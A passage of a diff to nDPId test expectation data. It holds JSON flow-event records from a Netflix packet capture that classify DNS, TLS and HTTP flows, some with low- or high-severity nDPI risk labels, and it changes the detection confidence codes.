-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 